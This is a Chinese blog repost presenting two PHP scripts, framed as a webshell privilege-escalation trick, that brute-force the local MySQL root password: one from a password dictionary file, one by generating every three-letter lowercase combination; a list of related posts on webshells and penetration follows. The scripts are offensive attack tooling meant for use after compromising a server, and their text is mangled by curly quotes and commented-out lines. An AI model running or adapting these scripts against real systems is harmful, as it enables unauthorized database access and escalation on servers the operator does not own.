webshell另类提权新姿势-php本地猜解MYSQL
来源:互联网 发布:c语言是否有指针 编辑:程序博客网 时间:2024/06/09 16:22
代码笔记
php本地猜解MYSQL-字典文件猜解
<?set_time_limit(0); //脚本不超时$user=”root”; //用户名//$passwd=file(“password.txt”); //密码字典//for($i=0;$i<count($passwd);$i++){//$pass=$passwd[$i];connect($user,$pass);flush();//}echo “扫描结束!”;function connect($user,$pass) {$conn=@mysql_connect(“localhost”,$user,$pass);if($conn){echo “<font color=’#0000FF’><b>得到密码:<font color=’#FF0000′>”.$pass.”</font>!!!</b></font>”;exit();}else {echo $pass.’‘;}}?>
php本地猜解MYSQL-暴力猜解
<textarea rows=25 cols=90 id=’t1′><?phpset_time_limit(0);$fruit=array(‘a’,’b’,’c’,’d’,’e’,’f’,’g’,’h’,’i’,’j’,’k’,’l’,’m’,’n’,’o’,’p’,’q’,’r‘,’s’,’t’,’u’,’v’,’w’,’x’,’y’,’z’); //密码组合单个字符$mmcd=3; //密码长度$jlcs1=0;$dishes[]=range(1,$mmcd);//开始循环for($i=0;$i<$mmcd;$i++){foreach($dishes as $k=>$v){foreach($fruit as $_fruit){$v[$i]=$_fruit;$dishes[]=$v;unset($dishes[$k]);$t=implode(”,$v);$user='root';$pass=$t;$conn=@mysql_connect(‘localhost’,$user,$pass);//每生成800个密码自动删除文本框并创建一个文本框$jlcs1=$jlcs1+1;if($jlcs1==800){echo “</textarea>”;echo “<script language=\”JavaScript\”>var v = document.getElementById(‘t1′);v.parentNode.removeChild(v);</script>”;echo “<textarea rows=25 cols=90 id=’t1′>”;$jlcs1=0;}//测试密码if($conn){echo “<script language=\”JavaScript\”>var v = document.getElementById(‘t1′);v.parentNode.removeChild(v);</script>”;echo “</textarea>”;echo “<font color=’#0000FF’><b>得到密码: <fontcolor=’#FF0000′>”.$pass.”</font>! ! ! </b></font>”;exit();}else {echo $pass.’ ‘;}flush();}}//总循环输出echo “</textarea>”;echo “<script language=\”JavaScript\”>var v = document.getElementById(‘t1′);v.parentNode.removeChild(v);</script>”;echo “<textarea rows=25 cols=90 id=’t1′>”;echo ‘扫描’,$i+1,'!';}?>
博客的文章都会发到个人订阅号上,欢迎关注
0 0
- webshell另类提权新姿势-php本地猜解MYSQL
- WEBSHELL姿势之SQL一句话
- 另类sql注入拿webshell
- PHP webshell
- joomla CMS后台另类拿WebShell方法
- php webshell 加密代码
- php webshell code
- php webshell的防范
- b374k php webshell
- php webshell 过狗
- Android中退出app的另类姿势
- 本地搭建apache+php+mysql
- WEBSHELL姿势之nginx文件类型错误解析漏洞实例
- WEBSHELL姿势之文件上传漏洞(渗透实验)
- WEBSHELL姿势之不安全的HTTP方法(渗透实验)
- php扫马、内网查mysql数据库账号密码(内网webshell渗透)
- PHP一句话Webshell变形总结
- PHP WebShell源码下载(1)
- OpenWRT查看CPU,RAM,Flash信息参数
- 免费的XMind 思维导图软件
- JAVA 异常 throwable exception error throws throw
- PHP中的变量
- 浅谈HTTP中Get与Post的区别
- webshell另类提权新姿势-php本地猜解MYSQL
- 读写锁pthread_rwlock_t的使用
- Android:使用ViewPager实现左右滑动切换图片 (简单版)
- JS邮箱验证
- numpy使用过程中小函数记录
- iOS 中的事件处理
- 日期处理类
- linux驱动头文件说明
- android学习总结